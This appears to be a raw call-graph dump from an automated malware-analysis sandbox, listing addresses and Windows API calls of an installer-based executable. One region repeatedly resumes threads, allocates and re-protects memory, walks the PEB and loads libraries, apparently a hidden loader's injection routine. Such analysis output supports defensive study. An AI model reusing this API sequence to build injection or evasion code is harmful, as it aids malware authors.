8741 402443 8739->8741 8742 40246e 8740->8742 8744 40247b 8741->8744 8745 402da6 17 API calls 8741->8745 8747 402e64 8742->8747 8746 402454 RegDeleteValueW RegCloseKey 8745->8746 8746->8744 8748 402e71 8747->8748 8749 402e78 8747->8749 8748->8744 8749->8748 8751 402ea9 8749->8751 8752 4063aa RegOpenKeyExW 8751->8752 8753 402ed7 8752->8753 8754 402f81 8753->8754 8755 402ee7 RegEnumValueW 8753->8755 8756 402f0a 8753->8756 8754->8748 8755->8756 8757 402f71 RegCloseKey 8755->8757 8756->8757 8758 402f46 RegEnumKeyW 8756->8758 8759 402f4f RegCloseKey 8756->8759 8761 402ea9 6 API calls 8756->8761 8757->8754 8758->8756 8758->8759 8760 40690a 5 API calls 8759->8760 8762 402f5f 8760->8762 8761->8756 8762->8754 8763 402f63 RegDeleteKeyW 8762->8763 8763->8754 8764 2f49a80 8765 2f49b13 8764->8765 8766 2f57709 NtResumeThread 8765->8766 8767 2f49be1 8766->8767 8768 2f57709 NtResumeThread 8767->8768 8769 2f49c24 8768->8769 8770 2f57709 NtResumeThread 8769->8770 8771 2f49d01 8770->8771 8772 2f57709 NtResumeThread 8771->8772 8773 2f49d78 8772->8773 9347 401735 9348 402da6 17 API calls 9347->9348 9349 40173c SearchPathW 9348->9349 9350 401757 9349->9350 9351 2f4b181 9352 2f4b1bd 9351->9352 9353 2f57709 NtResumeThread 9352->9353 9354 2f4b376 9352->9354 9353->9354 8774 71031774 8775 710317a3 8774->8775 8776 71031bff 22 API calls 8775->8776 8777 710317aa 8776->8777 8778 710317b1 8777->8778 8779 710317bd 8777->8779 8782 71031312 2 API calls 8778->8782 8780 710317c7 8779->8780 8781 710317e4 8779->8781 8783 710315dd 3 API calls 8780->8783 8784 710317ea 8781->8784 8785 7103180e 8781->8785 8789 710317bb 8782->8789 8786 710317cc 8783->8786 8787 71031654 3 API calls 8784->8787 8788 710315dd 3 API calls 8785->8788 8790 71031654 3 API calls 8786->8790 8791 710317ef 8787->8791 8788->8789 8792 710317d2 8790->8792 8793 71031312 2 API calls 8791->8793 8794 71031312 2 API calls 8792->8794 8795 710317f5 GlobalFree 8793->8795 8796 710317d8 GlobalFree 8794->8796 8795->8789 8797 71031809 GlobalFree 8795->8797 8796->8789 8797->8789 9355 401d38 9356 402d84 17 API calls 9355->9356 9357 401d3f 9356->9357 9358 402d84 17 API calls 9357->9358 9359 401d4b GetDlgItem 9358->9359 9360 402638 9359->9360 9361 2f49b8c 9362 2f49be1 9361->9362 9363 2f57709 NtResumeThread 9361->9363 9364 2f57709 NtResumeThread 9362->9364 9363->9362 9365 2f49c24 9364->9365 9366 2f57709 NtResumeThread 9365->9366 9367 2f49d01 9366->9367 9368 2f57709 NtResumeThread 9367->9368 9369 2f49d78 9368->9369 8798 71031979 8799 7103199c 8798->8799 8800 710319d1 GlobalFree 8799->8800 8801 710319e3 8799->8801 8800->8801 8802 71031312 2 API calls 8801->8802 8803 71031b6e GlobalFree GlobalFree 8802->8803 8389 71032a7f 8390 71032acf 8389->8390 8391 71032a8f VirtualProtect 8389->8391 8391->8390 9370 2f4e189 9371 2f4e1c9 GetPEB 9370->9371 9373 2f4e462 9371->9373 8804 40263e 8805 402652 8804->8805 8806 40266d 8804->8806 8809 402d84 17 API calls 8805->8809 8807 402672 8806->8807 8808 40269d 8806->8808 8810 402da6 17 API calls 8807->8810 8811 402da6 17 API calls 8808->8811 8819 402659 8809->8819 8812 402679 8810->8812 8813 4026a4 lstrlenW 8811->8813 8821 40655f WideCharToMultiByte 8812->8821 8813->8819 8815 40268d lstrlenA 8815->8819 8816 4026e7 8817 4026d1 8817->8816 8818 4060df WriteFile 8817->8818 8818->8816 8819->8816 8819->8817 8822 40610e SetFilePointer 8819->8822 8821->8815 8823 40612a 8822->8823 8824 406142 8822->8824 8825 4060b0 ReadFile 8823->8825 8824->8817 8826 406136 8825->8826 8826->8824 8827 406173 SetFilePointer 8826->8827 8828 40614b SetFilePointer 8826->8828 8827->8824 8828->8827 8829 406156 8828->8829 8830 4060df WriteFile 8829->8830 8830->8824 7591 4015c1 7592 402da6 17 API calls 7591->7592 7593 4015c8 7592->7593 7594 405eb7 4 API calls 7593->7594 7607 4015d1 7594->7607 7595 401631 7597 401663 7595->7597 7598 401636 7595->7598 7596 405e39 CharNextW 7596->7607 7600 401423 24 API calls 7597->7600 7618 401423 7598->7618 7604 40165b 7600->7604 7606 40164a SetCurrentDirectoryW 7606->7604 7607->7595 7607->7596 7608 401617 GetFileAttributesW 7607->7608 7610 405b08 7607->7610 7613 405a6e CreateDirectoryW 7607->7613 7622 405aeb CreateDirectoryW 7607->7622 7608->7607 7625 40690a GetModuleHandleA 7610->7625 7614 405abb 7613->7614 7615 405abf GetLastError 7613->7615 7614->7607 7615->7614 7616 405ace SetFileSecurityW 7615->7616 7616->7614 7617 405ae4 GetLastError 7616->7617 7617->7614 7619 40559f 24 API calls 7618->7619 7620 401431 7619->7620 7621 40653d lstrcpynW 7620->7621 7621->7606 7623 405afb 7622->7623 7624 405aff GetLastError 7622->7624 7623->7607 7624->7623 7626 406930 GetProcAddress 7625->7626 7627 406926 7625->7627 7629 405b0f 7626->7629 7631 40689a GetSystemDirectoryW 7627->7631 7629->7607 7630 40692c 7630->7626 7630->7629 7632 4068bc wsprintfW LoadLibraryExW 7631->7632 7632->7630 8831 2f48e76 8832 2f48e9b 8831->8832 8835 2f48ee8 8831->8835 8833 2f48ebc 8832->8833 8834 2f48edb 8832->8834 8833->8835 8837 2f4a20e 5 API calls 8833->8837 8834->8835 8836 2f4a20e 5 API calls 8834->8836 8836->8835 8837->8835 8838 4028c4 8839 4028ca 8838->8839 8840 4028d2 FindClose 8839->8840 8841 402c2a 8839->8841 8840->8841 8849 4016cc 8850 402da6 17 API calls 8849->8850 8851 4016d2 GetFullPathNameW 8850->8851 8852 40170e 8851->8852 8853 4016ec 8851->8853 8854 401723 GetShortPathNameW 8852->8854 8855 402c2a 8852->8855 8853->8852 8856 406873 2 API calls 8853->8856 8854->8855 8857 4016fe 8856->8857 8857->8852 8859 40653d lstrcpynW 8857->8859 8859->8852 9381 4045cf lstrcpynW lstrlenW 8075 4014d7 8076 402d84 17 API calls 8075->8076 8077 4014dd Sleep 8076->8077 8079 402c2a 8077->8079 8080 4020d8 8081 4020ea 8080->8081 8091 40219c 8080->8091 8082 402da6 17 API calls 8081->8082 8084 4020f1 8082->8084 8083 401423 24 API calls 8085 4022f6 8083->8085 8086 402da6 17 API calls 8084->8086 8087 4020fa 8086->8087 8088 402110 LoadLibraryExW 8087->8088 8089 402102 GetModuleHandleW 8087->8089 8090 402121 8088->8090 8088->8091 8089->8088 8089->8090 8103 406979 8090->8103 8091->8083 8094 402132 8096 402151 8094->8096 8097 40213a 8094->8097 8095 40216b 8098 40559f 24 API calls 8095->8098 8108 71031817 8096->8108 8100 401423 24 API calls 8097->8100 8099 402142 8098->8099 8099->8085 8101 40218e FreeLibrary 8099->8101 8100->8099 8101->8085 8150 40655f WideCharToMultiByte 8103->8150 8105 406996 8106 40699d GetProcAddress 8105->8106 8107 40212c 8105->8107 8106->8107 8107->8094 8107->8095 8109 7103184a 8108->8109 8151 71031bff 8109->8151 8111 71031851 8112 71031976 8111->8112 8113 71031862 8111->8113 8114 71031869 8111->8114 8112->8099 8200 7103243e 8113->8200 8184 71032480 8114->8184 8119 710318af 8213 71032655 8119->8213 8120 710318cd 8125 710318d3 8120->8125 8126 7103191e 8120->8126 8121 71031898 8135 7103188e 8121->8135 8210 71032e23 8121->8210 8122 7103187f 8124 71031885 8122->8124 8128 71031890 8122->8128 8124->8135 8194 71032b98 8124->8194 8232 71031666 8125->8232 8132 71032655 10 API calls 8126->8132 8127 710318b5 8224 71031654 8127->8224 8204 71032810 8128->8204 8133 7103190f 8132->8133 8141 71031965 8133->8141 8238 71032618 8133->8238 8135->8119 8135->8120 8139 71031896 8139->8135 8140 71032655 10 API calls 8140->8133 8141->8112 8145 7103196f GlobalFree 8141->8145 8145->8112 8147 71031951 8147->8141 8242 710315dd wsprintfW 8147->8242 8148 7103194a FreeLibrary 8148->8147 8150->8105 8245 710312bb GlobalAlloc 8151->8245 8153 71031c26 8246 710312bb GlobalAlloc 8153->8246 8155 71031e6b GlobalFree GlobalFree GlobalFree 8156 71031e88 8155->8156 8174 71031ed2 8155->8174 8157 7103227e 8156->8157 8164 71031e9d 8156->8164 8156->8174 8159 710322a0 GetModuleHandleW 8157->8159 8157->8174 8158 71031d26 GlobalAlloc 8170 71031c31 8158->8170 8162 710322b1 LoadLibraryW 8159->8162 8163 710322c6 8159->8163 8160 71031d71 lstrcpyW 8166 71031d7b lstrcpyW 8160->8166 8161 71031d8f GlobalFree 8161->8170 8162->8163 8162->8174 8253 710316bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 8163->8253 8164->8174 8249 710312cc 8164->8249 8166->8170 8167 71032318 8169 71032325 lstrlenW 8167->8169 8167->8174 8168 71032126 8252 710312bb GlobalAlloc 8168->8252 8254 710316bd WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 8169->8254 8170->8155 8170->8158 8170->8160 8170->8161 8170->8166 8170->8168 8173 710321ae 8170->8173 8170->8174 8177 71032067 GlobalFree 8170->8177 8178 710312cc 2 API calls 8170->8178 8179 71031dcd 8170->8179 8173->8174 8180 71032216 lstrcpyW 8173->8180 8174->8111 8175 710322d8 8175->8167 8182 71032302 GetProcAddress 8175->8182 8177->8170 8178->8170 8179->8170 8247 7103162f GlobalSize GlobalAlloc 8179->8247 8180->8174 8182->8167 8183 7103212f 8183->8111 8192 71032498 8184->8192 8186 710325c1 GlobalFree 8189 7103186f 8186->8189 8186->8192 8187 71032540 GlobalAlloc WideCharToMultiByte 8187->8186 8188 7103256b GlobalAlloc CLSIDFromString 8188->8186 8189->8121 8189->8122 8189->8135 8190 710312cc GlobalAlloc lstrcpynW 8190->8192 8191 7103258a 8191->8186 8260 710327a4 8191->8260 8192->8186 8192->8187 8192->8188 8192->8190 8192->8191 8256 7103135a 8192->8256 8196 71032baa 8194->8196 8195 71032c4f CreateFileA 8199 71032c6d 8195->8199 8196->8195 8198 71032d39 8198->8135 8263 71032b42 8199->8263 8201 71032453 8200->8201 8202 7103245e GlobalAlloc 8201->8202 8203 71031868 8201->8203 8202->8201 8203->8114 8208 71032840 8204->8208 8205 710328db GlobalAlloc 8209 710328fe 8205->8209 8206 710328ee 8207 710328f4 GlobalSize 8206->8207 8206->8209 8207->8209 8208->8205 8208->8206 8209->8139 8212 71032e2e 8210->8212 8211 71032e6e GlobalFree 8212->8211 8267 710312bb GlobalAlloc 8213->8267 8215 7103270b lstrcpynW 8220 7103265f 8215->8220 8216 710326fa StringFromGUID2 8216->8220 8217 710326d8 MultiByteToWideChar 8217->8220 8218 7103271e wsprintfW 8218->8220 8219 71032742 GlobalFree 8219->8220 8220->8215 8220->8216 8220->8217 8220->8218 8220->8219 8221 71032777 GlobalFree 8220->8221 8222 71031312 2 API calls 8220->8222 8268 71031381 8220->8268 8221->8127 8222->8220 8272 710312bb GlobalAlloc 8224->8272 8226 71031659 8227 71031666 2 API calls 8226->8227 8228 71031663 8227->8228 8229 71031312 8228->8229 8230 71031355 GlobalFree 8229->8230 8231 7103131b GlobalAlloc lstrcpynW 8229->8231 8230->8133 8231->8230 8233 71031672 wsprintfW 8232->8233 8235 7103169f lstrcpyW 8232->8235 8237 710316b8 8233->8237 8235->8237 8237->8140 8239 71031931 8238->8239 8240 71032626 8238->8240 8239->8147 8239->8148 8240->8239 8241 71032642 GlobalFree 8240->8241 8241->8240 8243 71031312 2 API calls 8242->8243 8244 710315fe 8243->8244 8244->8141 8245->8153 8246->8170 8248 7103164d 8247->8248 8248->8179 8255 710312bb GlobalAlloc 8249->8255 8251 710312db lstrcpynW 8251->8174 8252->8183 8253->8175 8254->8174 8255->8251 8257 71031361 8256->8257 8258 710312cc 2 API calls 8257->8258 8259 7103137f 8258->8259 8259->8192 8261 710327b2 VirtualAlloc 8260->8261 8262 71032808 8260->8262 8261->8262 8262->8191 8264 71032b4d 8263->8264 8265 71032b52 GetLastError 8264->8265 8266 71032b5d 8264->8266 8265->8266 8266->8198 8267->8220 8269 7103138a 8268->8269 8270 710313ac 8268->8270 8269->8270 8271 71031390 lstrcpyW 8269->8271 8270->8220 8271->8270 8272->8226 8864 2f4a06e 8865 2f4a0ca 8864->8865 8866 2f55355 5 API calls 8865->8866 8867 2f4a0ec 8866->8867 8403 401ede 8404 402d84 17 API calls 8403->8404 8405 401ee4 8404->8405 8406 402d84 17 API calls 8405->8406 8407 401ef0 8406->8407 8408 401f07 EnableWindow 8407->8408 8409 401efc ShowWindow 8407->8409 8410 402c2a 8408->8410 8409->8410 8411 4056de 8412 405888 8411->8412 8413 4056ff GetDlgItem GetDlgItem GetDlgItem 8411->8413 8415 405891 GetDlgItem CreateThread CloseHandle 8412->8415 8416 4058b9 8412->8416 8457 4044ce SendMessageW 8413->8457 8415->8416 8460 405672 5 API calls 8415->8460 8418 4058e4 8416->8418 8419 4058d0 ShowWindow ShowWindow 8416->8419 8420 405909 8416->8420 8417 40576f 8423 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 8417->8423 8421 4058f0 8418->8421 8424 405944 8418->8424 8459 4044ce SendMessageW 8419->8459 8422 404500 8 API calls 8420->8422 8426 4058f8 8421->8426 8427 40591e ShowWindow 8421->8427 8428 405917 8422->8428 8431 4057e4 8423->8431 8432 4057c8 SendMessageW SendMessageW 8423->8432 8424->8420 8433 405952 SendMessageW 8424->8433 8434 404472 SendMessageW 8426->8434 8429 405930 8427->8429 8430 40593e 8427->8430 8435 40559f 24 API calls 8429->8435 8436 404472 SendMessageW 8430->8436 8437 4057f7 8431->8437 8438 4057e9 SendMessageW 8431->8438 8432->8431 8433->8428 8439 40596b CreatePopupMenu 8433->8439 8434->8420 8435->8430 8436->8424 8441 404499 18 API calls 8437->8441 8438->8437 8440 40657a 17 API calls 8439->8440 8442 40597b AppendMenuW 8440->8442 8443 405807 8441->8443 8444 405998 GetWindowRect 8442->8444 8445 4059ab TrackPopupMenu 8442->8445 8446 405810 ShowWindow 8443->8446 8447 405844 GetDlgItem SendMessageW 8443->8447 8444->8445 8445->8428 8448 4059c6 8445->8448 8449 405833 8446->8449 8450 405826 ShowWindow 8446->8450 8447->8428 8451 40586b SendMessageW SendMessageW 8447->8451 8452 4059e2 SendMessageW 8448->8452 8458 4044ce SendMessageW 8449->8458 8450->8449 8451->8428 8452->8452 8453 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 8452->8453 8455 405a24 SendMessageW 8453->8455 8455->8455 8456 405a4d GlobalUnlock SetClipboardData CloseClipboard 8455->8456 8456->8428 8457->8417 8458->8447 8459->8418 8868 4028de 8869 4028e6 8868->8869 8870 4028ea FindNextFileW 8869->8870 8873 4028fc 8869->8873 8871 402943 8870->8871 8870->8873 8874 40653d lstrcpynW 8871->8874 8874->8873 7342 2f55355 7343 2f547be 7342->7343 7347 2f55367 7342->7347 7344 2f54888 LoadLibraryA 7343->7344 7360 2f54ee4 GetPEB 7343->7360 7346 2f54893 7344->7346 7353 2f55603 7347->7353 7354 2f547be 7347->7354 7348 2f5486f 7348->7344 7350 2f5546d 7351 2f555c3 NtAllocateVirtualMemory 7350->7351 7352 2f46a21 7350->7352 7351->7353 7355 2f5483d 7354->7355 7356 2f54888 LoadLibraryA 7355->7356 7357 2f54ee4 4 API calls 7355->7357 7358 2f54893 7356->7358 7359 2f5486f 7357->7359 7358->7350 7359->7356 7361 2f4e980 7360->7361 7362 2f5500b 7361->7362 7364 2f547be 4 API calls 7361->7364 7365 2f53557 7361->7365 7368 2f4a256 7361->7368 7362->7348 7364->7361 7372 2f5355d 7365->7372 7369 2f4a299 7368->7369 7380 2f55355 7369->7380 7371 2f4a2ba 7371->7361 7373 2f5359e 7372->7373 7374 2f55355 5 API calls 7373->7374 7375 2f53640 7374->7375 7392 2f539f8 7375->7392 7377 2f536f9 7379 2f54066 7377->7379 7395 2f537fb 7377->7395 7381 2f547be 7380->7381 7385 2f55367 7380->7385 7382 2f54888 LoadLibraryA 7381->7382 7383 2f54ee4 3 API calls 7381->7383 7384 2f54893 7382->7384 7386 2f5486f 7383->7386 7384->7371 7387 2f547be 3 API calls 7385->7387 7391 2f55603 7385->7391 7386->7382 7388 2f5546d 7387->7388 7389 2f555c3 NtAllocateVirtualMemory 7388->7389 7390 2f46a21 7388->7390 7389->7391 7390->7371 7391->7371 7393 2f53a26 CreateFileA 7392->7393 7393->7377 7396 2f5384e 7395->7396 7397 2f55355 5 API calls 7396->7397 7398 2f538be 7397->7398 7399 2f539f8 CreateFileA 7398->7399 7400 2f538ff 7399->7400 7400->7379 8875 404ce0 8876 404cf0 8875->8876 8877 404d0c 8875->8877 8886 405b81 GetDlgItemTextW 8876->8886 8878 404d12 SHGetPathFromIDListW 8877->8878 8879 404d3f 8877->8879 8881 404d22 8878->8881 8885 404d29 SendMessageW 8878->8885 8883 40140b 2 API calls 8881->8883 8882 404cfd SendMessageW 8882->8877 8883->8885 8885->8879 8886->8882 8887 2f4a25d 8888 2f55355 5 API calls 8887->8888 8889 2f4a2ba 8887->8889 8888->8889 9386 2f4af5d 9387 2f4af95 9386->9387 9388 2f4af9a 9386->9388 9387->9388 9389 2f57709 NtResumeThread 9387->9389 9390 2f46986 9388->9390 9391 2f57709 NtResumeThread 9388->9391 9392 2f4b17f 9388->9392 9389->9388 9391->9392 9392->9390 9393 2f57709 NtResumeThread 9392->9393 9393->9390 8890 402aeb 8891 402d84 17 API calls 8890->8891 8892 402af1 8891->8892 8893 40292e 8892->8893 8894 40657a 17 API calls 8892->8894 8894->8893 9394 2f4a55f 9395 2f4a576 9394->9395 9396 2f54888 LoadLibraryA 9395->9396 9397 2f54ee4 5 API calls 9395->9397 9398 2f54893 9396->9398 9399 2f5486f 9397->9399 9399->9396 8895 4026ec 8896 402d84 17 API calls 8895->8896 8898 4026fb 8896->8898 8897 402745 ReadFile 8897->8898 8907 402838 8897->8907 8898->8897 8899 4060b0 ReadFile 8898->8899 8900 40610e 5 API calls 8898->8900 8901 402785 MultiByteToWideChar 8898->8901 8902 40283a 8898->8902 8904 4027ab SetFilePointer MultiByteToWideChar 8898->8904 8905 40284b 8898->8905 8898->8907 8899->8898 8900->8898 8901->8898 8908 406484 wsprintfW 8902->8908 8904->8898 8906 40286c SetFilePointer 8905->8906 8905->8907 8906->8907 8908->8907 8909 2f4e245 8910 2f4e296 GetPEB 8909->8910 8911 2f4e28d 8909->8911 8912 2f4e2b6 8910->8912 8911->8910 8911->8911 9404 4023f4 9405 402da6 17 API calls 9404->9405 9406 402403 9405->9406 9407 402da6 17 API calls 9406->9407 9408 40240c 9407->9408 9409 402da6 17 API calls 9408->9409 9410 402416 GetPrivateProfileStringW 9409->9410 8913 4014f5 SetForegroundWindow 8914 402c2a 8913->8914 9411 401ff6 9412 402da6 17 API calls 9411->9412 9413 401ffd 9412->9413 9414 406873 2 API calls 9413->9414 9415 402003 9414->9415 9417 402014 9415->9417 9418 406484 wsprintfW 9415->9418 9418->9417 8379 2f47848 8382 2f475df 8379->8382 8380 2f478b6 8381 2f56fc6 NtProtectVirtualMemory 8381->8382 8382->8379 8382->8380 8382->8381 8918 4022ff 8919 402da6 17 API calls 8918->8919 8920 402305 8919->8920 8921 402da6 17 API calls 8920->8921 8922 40230e 8921->8922 8923 402da6 17 API calls 8922->8923 8924 402317 8923->8924 8925 406873 2 API calls 8924->8925 8926 402320 8925->8926 8927 402331 lstrlenW lstrlenW 8926->8927 8931 402324 8926->8931 8929 40559f 24 API calls 8927->8929 8928 40559f 24 API calls 8932 40232c 8928->8932 8930 40236f SHFileOperationW 8929->8930 8930->8931 8930->8932 8931->8928 8931->8932 9426 4019ff 9427 402da6 17 API calls 9426->9427 9428 401a06 9427->9428 9429 402da6 17 API calls 9428->9429 9430 401a0f 9429->9430 9431 401a16 lstrcmpiW 9430->9431 9432 401a28 lstrcmpW 9430->9432 9433 401a1c 9431->9433 9432->9433 8933 2f49c35 8934 2f49d01 8933->8934 8935 2f57709 NtResumeThread 8933->8935 8936 2f57709 NtResumeThread 8934->8936 8935->8934 8937 2f49d78 8936->8937 9434 401d81 9435 401d94 GetDlgItem 9434->9435 9436 401d87 9434->9436 9438 401d8e 9435->9438 9437 402d84 17 API calls 9436->9437 9437->9438 9440 402da6 17 API calls 9438->9440 9442 401dd5 GetClientRect LoadImageW SendMessageW 9438->9442 9440->9442 9441 401e33 9443 401e38 DeleteObject 9441->9443 9444 401e3f 9441->9444 9442->9441 9442->9444 9443->9444 9445 402383 9446 40238a 9445->9446 9449 40239d 9445->9449 9447 40657a 17 API calls 9446->9447 9448 402397 9447->9448 9448->9449 9450 405b9d MessageBoxIndirectW 9448->9450 9450->9449 7634 2f55830 7635 2f55876 7634->7635 7636 2f547be 5 API calls 7635->7636 7642 2f55890 7636->7642 7637 2f547be 7638 2f54888 LoadLibraryA 7637->7638 7639 2f54ee4 5 API calls 7637->7639 7640 2f54893 7638->7640 7641 2f5486f 7639->7641 7641->7638 7642->7637 7644 2f55f10 7642->7644 7645 2f57709 7642->7645 7647 2f5770e 7645->7647 7648 2f5776a 7647->7648 7649 2f5799a NtResumeThread 7648->7649 7650 2f579f7 7649->7650 9451 2f4ab3c 9452 2f4ab69 9451->9452 9453 2f4a215 5 API calls 9452->9453 9456 2f4e980 9452->9456 9453->9456 9454 2f4a256 5 API calls 9454->9456 9455 2f547be 5 API calls 9455->9456 9456->9454 9456->9455 9457 2f53557 9456->9457 9458 2f5355d 5 API calls 9457->9458 9459 2f540c3 9458->9459 7651 40248a 7652 402da6 17 API calls 7651->7652 7653 40249c 7652->7653 7654 402da6 17 API calls 7653->7654 7655 4024a6 7654->7655 7668 402e36 7655->7668 7658 402c2a 7659 4024de 7666 4024ea 7659->7666 7692 402d84 7659->7692 7660 402da6 17 API calls 7662 4024d4 lstrlenW 7660->7662 7661 402509 RegSetValueExW 7665 40251f RegCloseKey 7661->7665 7662->7659 7665->7658 7666->7661 7672 4032b4 7666->7672 7669 402e51 7668->7669 7695 4063d8 7669->7695 7673 4032cd 7672->7673 7674 4032fb 7673->7674 7702 4034e5 SetFilePointer 7673->7702 7699 4034cf 7674->7699 7678 403468 7680 4034aa 7678->7680 7685 40346c 7678->7685 7679 403318 GetTickCount 7681 403452 7679->7681 7688 403367 7679->7688 7682 4034cf ReadFile 7680->7682 7681->7661 7682->7681 7683 4034cf ReadFile 7683->7688 7684 4034cf ReadFile 7684->7685 7685->7681 7685->7684 7686 4060df WriteFile 7685->7686 7686->7685 7687 4033bd GetTickCount 7687->7688 7688->7681 7688->7683 7688->7687 7689 4033e2 MulDiv wsprintfW 7688->7689 7691 4060df WriteFile 7688->7691 7690 40559f 24 API calls 7689->7690 7690->7688 7691->7688 7693 40657a 17 API calls 7692->7693 7694 402d99 7693->7694 7694->7666 7696 4063e7 7695->7696 7697 4063f2 RegCreateKeyExW 7696->7697 7698 4024b6 7696->7698 7697->7698 7698->7658 7698->7659 7698->7660 7700 4060b0 ReadFile 7699->7700 7701 403306 7700->7701 7701->7678 7701->7679 7701->7681 7702->7674 7720 2f4853e 7721 2f514e0 7720->7721 7722 2f515f1 TerminateProcess 7721->7722 7723 2f5160d 7721->7723 7725 2f51579 7721->7725 7722->7721 7724 2f51611 7723->7724 7728 2f51671 7723->7728 7726 2f51652 7724->7726 7727 2f5161d GetPEB 7724->7727 7727->7726 7733 2f51720 7728->7733 7732 2f53039 7734 2f51769 7733->7734 7735 2f51739 7733->7735 7734->7732 7737 2f48f87 7734->7737 7735->7734 7736 2f55355 5 API calls 7735->7736 7736->7735 7738 2f48fae 7737->7738 7739 2f55355 5 API calls 7738->7739 7740 2f49000 7738->7740 7739->7740 7742 2f49134 7740->7742 7743 2f4b40c 7740->7743 7744 2f547be 5 API calls 7743->7744 7745 2f4b3fc 7744->7745 9460 40498a 9461 4049b6 9460->9461 9462 4049c7 9460->9462 9521 405b81 GetDlgItemTextW 9461->9521 9463 4049d3 GetDlgItem 9462->9463 9470 404a32 9462->9470 9465 4049e7 9463->9465 9469 4049fb SetWindowTextW 9465->9469 9474 405eb7 4 API calls 9465->9474 9466 404b16 9471 404cc5 9466->9471 9523 405b81 GetDlgItemTextW 9466->9523 9467 4049c1 9468 4067c4 5 API calls 9467->9468 9468->9462 9475 404499 18 API calls 9469->9475 9470->9466 9470->9471 9476 40657a 17 API calls 9470->9476 9473 404500 8 API calls 9471->9473 9478 404cd9 9473->9478 9479 4049f1 9474->9479 9480 404a17 9475->9480 9481 404aa6 SHBrowseForFolderW 9476->9481 9477 404b46 9482 405f14 18 API calls 9477->9482 9479->9469 9486 405e0c 3 API calls 9479->9486 9483 404499 18 API calls 9480->9483 9481->9466 9484 404abe CoTaskMemFree 9481->9484 9485 404b4c 9482->9485 9487 404a25 9483->9487 9488 405e0c 3 API calls 9484->9488 9524 40653d lstrcpynW 9485->9524 9486->9469 9522 4044ce SendMessageW 9487->9522 9490 404acb 9488->9490 9494 404b02 SetDlgItemTextW 9490->9494 9497 40657a 17 API calls 9490->9497 9492 404b63 9496 40690a 5 API calls 9492->9496 9493 404a2b 9495 40690a 5 API calls 9493->9495 9494->9466 9495->9470 9503 404b6a 9496->9503 9498 404aea lstrcmpiW 9497->9498 9498->9494 9500 404afb lstrcatW 9498->9500 9499 404bab 9525 40653d lstrcpynW 9499->9525 9500->9494 9502 404bb2 9504 405eb7 4 API calls 9502->9504 9503->9499 9508 405e58 2 API calls 9503->9508 9509 404c03 9503->9509 9505 404bb8 GetDiskFreeSpaceW 9504->9505 9507 404bdc MulDiv 9505->9507 9505->9509 9507->9509 9508->9503 9510 404c74 9509->9510 9512 404e0f 20 API calls 9509->9512 9511 404c97 9510->9511 9514 40140b 2 API calls 9510->9514 9526 4044bb KiUserCallbackDispatcher 9511->9526 9513 404c61 9512->9513 9515 404c76 SetDlgItemTextW 9513->9515 9516 404c66 9513->9516 9514->9511 9515->9510 9518 404d46 20 API calls 9516->9518 9518->9510 9519 404cb3 9519->9471 9520 4048e3 SendMessageW 9519->9520 9520->9471 9521->9467 9522->9493 9523->9477 9524->9492 9525->9502 9526->9519 9527 2f4b338 9528 2f57709 NtResumeThread 9527->9528 9529 2f4b376 9527->9529 9528->9529 8945 401491 8946 40559f 24 API calls 8945->8946 8947 401498 8946->8947 8948 402891 8949 402898 8948->8949 8950 402ba9 8948->8950 8951 402d84 17 API calls 8949->8951 8952 40289f 8951->8952 8953 4028ae SetFilePointer 8952->8953 8953->8950 8954 4028be 8953->8954 8956 406484 wsprintfW 8954->8956 8956->8950 9530 402f93 9531 402fa5 SetTimer 9530->9531 9533 402fbe 9530->9533 9531->9533 9532 403013 9533->9532 9534 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 9533->9534 9534->9532 8273 403f9a 8274 403fb2 8273->8274 8275 404113 8273->8275 8274->8275 8276 403fbe 8274->8276 8277 404164 8275->8277 8278 404124 GetDlgItem GetDlgItem 8275->8278 8280 403fc9 SetWindowPos 8276->8280 8281 403fdc 8276->8281 8279 4041be 8277->8279 8290 401389 2 API calls 8277->8290 8282 404499 18 API calls 8278->8282 8283 4044e5 SendMessageW 8279->8283 8300 40410e 8279->8300 8280->8281 8284 403fe5 ShowWindow 8281->8284 8285 404027 8281->8285 8286 40414e SetClassLongW 8282->8286 8312 4041d0 8283->8312 8291 404100 8284->8291 8292 404005 GetWindowLongW 8284->8292 8287 404046 8285->8287 8288 40402f DestroyWindow 8285->8288 8289 40140b 2 API calls 8286->8289 8293 40404b SetWindowLongW 8287->8293 8294 40405c 8287->8294 8345 404422 8288->8345 8289->8277 8295 404196 8290->8295 8355 404500 8291->8355 8292->8291 8297 40401e ShowWindow 8292->8297 8293->8300 8294->8291 8298 404068 GetDlgItem 8294->8298 8295->8279 8299 40419a SendMessageW 8295->8299 8297->8285 8303 404096 8298->8303 8304 404079 SendMessageW IsWindowEnabled 8298->8304 8299->8300 8301 40140b 2 API calls 8301->8312 8302 404424 DestroyWindow EndDialog 8302->8345 8307 4040a3 8303->8307 8309 4040ea SendMessageW 8303->8309 8310 4040b6 8303->8310 8319 40409b 8303->8319 8304->8300 8304->8303 8305 404453 ShowWindow 8305->8300 8306 40657a 17 API calls 8306->8312 8307->8309 8307->8319 8309->8291 8313 4040d3 8310->8313 8314 4040be 8310->8314 8311 4040d1 8311->8291 8312->8300 8312->8301 8312->8302 8312->8306 8315 404499 18 API calls 8312->8315 8336 404364 DestroyWindow 8312->8336 8346 404499 8312->8346 8316 40140b 2 API calls 8313->8316 8317 40140b 2 API calls 8314->8317 8315->8312 8318 4040da 8316->8318 8317->8319 8318->8291 8318->8319 8352 404472 8319->8352 8321 40424b GetDlgItem 8322 404260 8321->8322 8323 404268 ShowWindow KiUserCallbackDispatcher 8321->8323 8322->8323 8349 4044bb KiUserCallbackDispatcher 8323->8349 8325 404292 EnableWindow 8330 4042a6 8325->8330 8326 4042ab GetSystemMenu EnableMenuItem SendMessageW 8327 4042db SendMessageW 8326->8327 8326->8330 8327->8330 8329 403f7b 18 API calls 8329->8330 8330->8326 8330->8329 8350 4044ce SendMessageW 8330->8350 8351 40653d lstrcpynW 8330->8351 8332 40430a lstrlenW 8333 40657a 17 API calls 8332->8333 8334 404320 SetWindowTextW 8333->8334 8335 401389 2 API calls 8334->8335 8335->8312 8337 40437e CreateDialogParamW 8336->8337 8336->8345 8338 4043b1 8337->8338 8337->8345 8339 404499 18 API calls 8338->8339 8340 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 8339->8340 8341 401389 2 API calls 8340->8341 